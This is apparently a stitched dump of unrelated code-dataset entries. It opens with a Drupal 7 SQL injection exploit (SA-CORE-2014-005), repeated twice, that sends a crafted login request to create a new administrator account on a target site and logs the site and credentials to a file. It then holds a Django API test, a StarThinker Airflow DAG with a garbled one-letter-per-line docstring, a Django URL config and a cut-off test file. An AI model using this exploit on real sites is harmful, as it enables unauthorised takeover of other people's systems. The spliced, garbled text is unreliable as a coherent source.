w = '\033[37m'
rr = '\033[39m'
class DrupalHash:
def __init__(self, stored_hash, password):
self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
self.last_hash = self.rehash(stored_hash, password)
def get_hash(self):
return self.last_hash
def password_get_count_log2(self, setting):
return self.itoa64.index(setting[3])
def password_crypt(self, algo, password, setting):
setting = setting[0:12]
if setting[0] != '$' or setting[2] != '$':
return False
count_log2 = self.password_get_count_log2(setting)
salt = setting[4:12]
if len(salt) < 8:
return False
count = 1 << count_log2
if algo == 'md5':
hash_func = hashlib.md5
elif algo == 'sha512':
hash_func = hashlib.sha512
else:
return False
hash_str = hash_func(salt + password).digest()
for c in range(count):
hash_str = hash_func(hash_str + password).digest()
output = setting + self.custom64(hash_str)
return output
def custom64(self, string, count = 0):
if count == 0:
count = len(string)
output = ''
i = 0
itoa64 = self.itoa64
while 1:
value = ord(string[i])
i += 1
output += itoa64[value & 0x3f]
if i < count:
value |= ord(string[i]) << 8
output += itoa64[(value >> 6) & 0x3f]
if i >= count:
break
i += 1
if i < count:
value |= ord(string[i]) << 16
output += itoa64[(value >> 12) & 0x3f]
if i >= count:
break
i += 1
output += itoa64[(value >> 18) & 0x3f]
if i >= count:
break
return output
def rehash(self, stored_hash, password):
# Drupal 6 compatibility
if len(stored_hash) == 32 and stored_hash.find('$') == -1:
return hashlib.md5(password).hexdigest()
# Drupal 7
if stored_hash[0:2] == 'U$':
stored_hash = stored_hash[1:]
password = hashlib.md5(password).hexdigest()
hash_type = stored_hash[0:3]
if hash_type == '$S$':
hash_str = self.password_crypt('sha512', password, stored_hash)
elif hash_type == '$H$' or hash_type == '$P$':
hash_str = self.password_crypt('md5', password, stored_hash)
else:
hash_str = False
return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
def randomAgentGen():
userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
UA = random.choice(userAgent)
return UA
def urldrupal(url):
try:
if url[:8] != "https://" and url[:7] != "http://":
sys.exit(1)
# Page login
url = url+'/?q=node&destination=node'
return url
except:
pass
commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
commandList.add_option('-t', '--target',
action="store",
help="Insert URL: http[s]://www.victim.com",
)
commandList.add_option('-u', '--username',
action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd',
action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.username or not options.pwd:
sys.exit(1)
host = options.target
user = options.username
password = <PASSWORD>
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = urldrupal(host)
# Add new user:
# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK<PASSWORD>X7B/M8<PASSWORD>E1Tp/kMO<PASSWORD>AZld' FROM users
#
# Set administrator permission (rid = 3):
# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
#
post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=<PASSWORD>&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
UA = randomAgentGen()
try:
req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
content = urllib2.urlopen(req).read()
if "mb_strlen() expects parameter 1" in content:
print c + ' [' + y + '+' + c + '] ' + y + 'Drupal Add admin' + g + ' [Vuln!!]'
with open('result/AdminTakeoverDrupal_results.txt', 'a') as writer:
writer.write(str(target).split('/')[2] + '/user/login' + '\n' + 'username: ' + str(user) + '\n'
+ 'password: ' + str(password) + '\n')
else:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except urllib2.HTTPError as e:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except urllib2.URLError as e:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
|
#!/usr/bin/python
#
#
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational
# purposes only and the author can not be held liable for
# any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
import hashlib, urllib2, optparse, random, sys
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.
r = '\033[31m'
g = '\033[32m'
y = '\033[33m'
b = '\033[34m'
m = '\033[35m'
c = '\033[36m'
w = '\033[37m'
rr = '\033[39m'
class DrupalHash:
def __init__(self, stored_hash, password):
self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
self.last_hash = self.rehash(stored_hash, password)
def get_hash(self):
return self.last_hash
def password_get_count_log2(self, setting):
return self.itoa64.index(setting[3])
def password_crypt(self, algo, password, setting):
setting = setting[0:12]
if setting[0] != '$' or setting[2] != '$':
return False
count_log2 = self.password_get_count_log2(setting)
salt = setting[4:12]
if len(salt) < 8:
return False
count = 1 << count_log2
if algo == 'md5':
hash_func = hashlib.md5
elif algo == 'sha512':
hash_func = hashlib.sha512
else:
return False
hash_str = hash_func(salt + password).digest()
for c in range(count):
hash_str = hash_func(hash_str + password).digest()
output = setting + self.custom64(hash_str)
return output
def custom64(self, string, count = 0):
if count == 0:
count = len(string)
output = ''
i = 0
itoa64 = self.itoa64
while 1:
value = ord(string[i])
i += 1
output += itoa64[value & 0x3f]
if i < count:
value |= ord(string[i]) << 8
output += itoa64[(value >> 6) & 0x3f]
if i >= count:
break
i += 1
if i < count:
value |= ord(string[i]) << 16
output += itoa64[(value >> 12) & 0x3f]
if i >= count:
break
i += 1
output += itoa64[(value >> 18) & 0x3f]
if i >= count:
break
return output
def rehash(self, stored_hash, password):
# Drupal 6 compatibility
if len(stored_hash) == 32 and stored_hash.find('$') == -1:
return hashlib.md5(password).hexdigest()
# Drupal 7
if stored_hash[0:2] == 'U$':
stored_hash = stored_hash[1:]
password = hashlib.md5(password).hexdigest()
hash_type = stored_hash[0:3]
if hash_type == '$S$':
hash_str = self.password_crypt('sha512', password, stored_hash)
elif hash_type == '$H$' or hash_type == '$P$':
hash_str = self.password_crypt('md5', password, stored_hash)
else:
hash_str = False
return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
def randomAgentGen():
userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
UA = random.choice(userAgent)
return UA
def urldrupal(url):
try:
if url[:8] != "https://" and url[:7] != "http://":
sys.exit(1)
# Page login
url = url+'/?q=node&destination=node'
return url
except:
pass
commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
commandList.add_option('-t', '--target',
action="store",
help="Insert URL: http[s]://www.victim.com",
)
commandList.add_option('-u', '--username',
action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd',
action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.username or not options.pwd:
sys.exit(1)
host = options.target
user = options.username
password = <PASSWORD>
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = urldrupal(host)
# Add new user:
# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK<PASSWORD>X7B/M8<PASSWORD>E1Tp/kMO<PASSWORD>AZld' FROM users
#
# Set administrator permission (rid = 3):
# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
#
post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=<PASSWORD>&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
UA = randomAgentGen()
try:
req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
content = urllib2.urlopen(req).read()
if "mb_strlen() expects parameter 1" in content:
print c + ' [' + y + '+' + c + '] ' + y + 'Drupal Add admin' + g + ' [Vuln!!]'
with open('result/AdminTakeoverDrupal_results.txt', 'a') as writer:
writer.write(str(target).split('/')[2] + '/user/login' + '\n' + 'username: ' + str(user) + '\n'
+ 'password: ' + str(password) + '\n')
else:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except urllib2.HTTPError as e:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except urllib2.URLError as e:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
|
en
| 0.623644
|
#!/usr/bin/python # # # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 # Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk) # # Tested on Drupal 7.31 with BackBox 3.x # # This material is intended for educational # purposes only and the author can not be held liable for # any kind of damages done whatsoever to your machine, # or damages caused by some other,creative application of this material. # In any case you disagree with the above statement,stop here. # START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py # Calculate a non-truncated Drupal 7 compatible password hash. # The consumer of these hashes must truncate correctly. # Drupal 6 compatibility # Drupal 7 # END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py # Page login # Check args # Add new user: # insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK<PASSWORD>X7B/M8<PASSWORD>E1Tp/kMO<PASSWORD>AZld' FROM users # # Set administrator permission (rid = 3): # insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3) # #%20%20]=test3&name[0]=test&pass=<PASSWORD>&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
| 2.212212
| 2
|
api/tests/test_views.py
|
pythonsway/library-manager
| 0
|
6628463
|
from datetime import datetime
from django.urls import reverse
from rest_framework.test import APITestCase
from catalog.models import Author, Book, Language
class BookListApiTest(APITestCase):
def setUp(self):
title = 'Django? Is that Spanish?'
author = Author.objects.create(name='<NAME>')
pub_date = datetime(2010, 5, 17)
isbn = 1111111111111
pages_num = 999
language = Language.objects.create(name='English', code='en')
Book.objects.create(
title=title,
pub_date=pub_date,
isbn=isbn,
pages_num=pages_num,
language=language)
Book.objects.get(id=1).authors.add(author)
def test_api_url_exists_at_desired_location(self):
response = self.client.get('/api/')
self.assertEqual(response.status_code, 200)
def test_view_url_accessible_by_name(self):
url = reverse('api-books')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
|
from datetime import datetime
from django.urls import reverse
from rest_framework.test import APITestCase
from catalog.models import Author, Book, Language
class BookListApiTest(APITestCase):
def setUp(self):
title = 'Django? Is that Spanish?'
author = Author.objects.create(name='<NAME>')
pub_date = datetime(2010, 5, 17)
isbn = 1111111111111
pages_num = 999
language = Language.objects.create(name='English', code='en')
Book.objects.create(
title=title,
pub_date=pub_date,
isbn=isbn,
pages_num=pages_num,
language=language)
Book.objects.get(id=1).authors.add(author)
def test_api_url_exists_at_desired_location(self):
response = self.client.get('/api/')
self.assertEqual(response.status_code, 200)
def test_view_url_accessible_by_name(self):
url = reverse('api-books')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
|
none
| 1
| 2.599146
| 3
|
|
starthinker_airflow/dags/dataset_dag.py
|
RMStanford/starthinker
| 0
|
6628464
|
###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
'''
Dataset
Create and permission a dataset in BigQuery.
S
p
e
c
i
f
y
t
h
e
n
a
m
e
o
f
t
h
e
d
a
t
a
s
e
t
.
I
f
d
a
t
a
s
e
t
e
x
i
s
t
s
,
i
t
i
s
i
n
c
h
a
n
g
e
d
.
A
d
d
e
m
a
i
l
s
a
n
d
/
o
r
g
r
o
u
p
s
t
o
a
d
d
r
e
a
d
p
e
r
m
i
s
s
i
o
n
.
C
A
U
T
I
O
N
:
R
e
m
o
v
i
n
g
p
e
r
m
i
s
s
i
o
n
s
i
n
S
t
a
r
T
h
i
n
k
e
r
h
a
s
n
o
e
f
f
e
c
t
.
C
A
U
T
I
O
N
:
T
o
r
e
m
o
v
e
p
e
r
m
i
s
s
i
o
n
s
y
o
u
h
a
v
e
t
o
e
d
i
t
t
h
e
d
a
t
a
s
e
t
.
'''
from starthinker_airflow.factory import DAG_Factory
USER_CONN_ID = "google_cloud_default" # The connection to use for user authentication.
GCP_CONN_ID = "" # The connection to use for service authentication.
INPUTS = {
'dataset_dataset': '', # Name of Google BigQuery dataset to create.
'dataset_emails': [], # Comma separated emails.
'dataset_groups': [], # Comma separated groups.
}
TASKS = [
{
'dataset': {
'auth': 'service',
'dataset': {
'field': {
'name': 'dataset_dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'Name of Google BigQuery dataset to create.'
}
},
'emails': {
'field': {
'name': 'dataset_emails',
'kind': 'string_list',
'order': 2,
'default': [
],
'description': 'Comma separated emails.'
}
},
'groups': {
'field': {
'name': 'dataset_groups',
'kind': 'string_list',
'order': 3,
'default': [
],
'description': 'Comma separated groups.'
}
}
}
}
]
DAG_FACTORY = DAG_Factory('dataset', { 'tasks':TASKS }, INPUTS)
DAG_FACTORY.apply_credentails(USER_CONN_ID, GCP_CONN_ID)
DAG = DAG_FACTORY.execute()
if __name__ == "__main__":
DAG_FACTORY.print_commandline()
|
###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
'''
Dataset
Create and permission a dataset in BigQuery.
S
p
e
c
i
f
y
t
h
e
n
a
m
e
o
f
t
h
e
d
a
t
a
s
e
t
.
I
f
d
a
t
a
s
e
t
e
x
i
s
t
s
,
i
t
i
s
i
n
c
h
a
n
g
e
d
.
A
d
d
e
m
a
i
l
s
a
n
d
/
o
r
g
r
o
u
p
s
t
o
a
d
d
r
e
a
d
p
e
r
m
i
s
s
i
o
n
.
C
A
U
T
I
O
N
:
R
e
m
o
v
i
n
g
p
e
r
m
i
s
s
i
o
n
s
i
n
S
t
a
r
T
h
i
n
k
e
r
h
a
s
n
o
e
f
f
e
c
t
.
C
A
U
T
I
O
N
:
T
o
r
e
m
o
v
e
p
e
r
m
i
s
s
i
o
n
s
y
o
u
h
a
v
e
t
o
e
d
i
t
t
h
e
d
a
t
a
s
e
t
.
'''
from starthinker_airflow.factory import DAG_Factory
USER_CONN_ID = "google_cloud_default" # The connection to use for user authentication.
GCP_CONN_ID = "" # The connection to use for service authentication.
INPUTS = {
'dataset_dataset': '', # Name of Google BigQuery dataset to create.
'dataset_emails': [], # Comma separated emails.
'dataset_groups': [], # Comma separated groups.
}
TASKS = [
{
'dataset': {
'auth': 'service',
'dataset': {
'field': {
'name': 'dataset_dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'Name of Google BigQuery dataset to create.'
}
},
'emails': {
'field': {
'name': 'dataset_emails',
'kind': 'string_list',
'order': 2,
'default': [
],
'description': 'Comma separated emails.'
}
},
'groups': {
'field': {
'name': 'dataset_groups',
'kind': 'string_list',
'order': 3,
'default': [
],
'description': 'Comma separated groups.'
}
}
}
}
]
DAG_FACTORY = DAG_Factory('dataset', { 'tasks':TASKS }, INPUTS)
DAG_FACTORY.apply_credentails(USER_CONN_ID, GCP_CONN_ID)
DAG = DAG_FACTORY.execute()
if __name__ == "__main__":
DAG_FACTORY.print_commandline()
|
en
| 0.595092
|
########################################################################### # # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ########################################################################### Dataset Create and permission a dataset in BigQuery. S p e c i f y t h e n a m e o f t h e d a t a s e t . I f d a t a s e t e x i s t s , i t i s i n c h a n g e d . A d d e m a i l s a n d / o r g r o u p s t o a d d r e a d p e r m i s s i o n . C A U T I O N : R e m o v i n g p e r m i s s i o n s i n S t a r T h i n k e r h a s n o e f f e c t . C A U T I O N : T o r e m o v e p e r m i s s i o n s y o u h a v e t o e d i t t h e d a t a s e t . # The connection to use for user authentication. # The connection to use for service authentication. # Name of Google BigQuery dataset to create. # Comma separated emails. # Comma separated groups.
| 1.508122
| 2
|
registration/urls.py
|
Yar59/vshaurme
| 1
|
6628465
|
<reponame>Yar59/vshaurme
from django.conf.urls import include, url
from . import views as signup
from django.contrib.auth import views
urlpatterns = [
url(r'^accounts/signup/$', signup.user_new, name='signup'),
url(r'^accounts/login/$', views.login, name='login'),
url(r'^accounts/logout/$', views.logout, name='logout', kwargs={'next_page': '/'}),
]
|
from django.conf.urls import include, url
from . import views as signup
from django.contrib.auth import views
urlpatterns = [
url(r'^accounts/signup/$', signup.user_new, name='signup'),
url(r'^accounts/login/$', views.login, name='login'),
url(r'^accounts/logout/$', views.logout, name='logout', kwargs={'next_page': '/'}),
]
|
none
| 1
| 1.782824
| 2
|
|
gmm/tests/test_GMM.py
|
meyer-lab/tensor-gmm
| 0
|
6628466
|
<filename>gmm/tests/test_GMM.py<gh_stars>0
"""
Test the data import.
"""
import pandas as pd
import numpy as np
from ..imports import smallDF
from ..GMM import cvGMM
from ..scImport import import_thompson_drug
from ..tensor import vector_to_cp_pt, comparingGMM, comparingGMMjax, vector_guess, maxloglik_ptnnp, minimize_func, tensorGMM_CV, covFactor_to_precisions
data_import, other_import = smallDF(10)
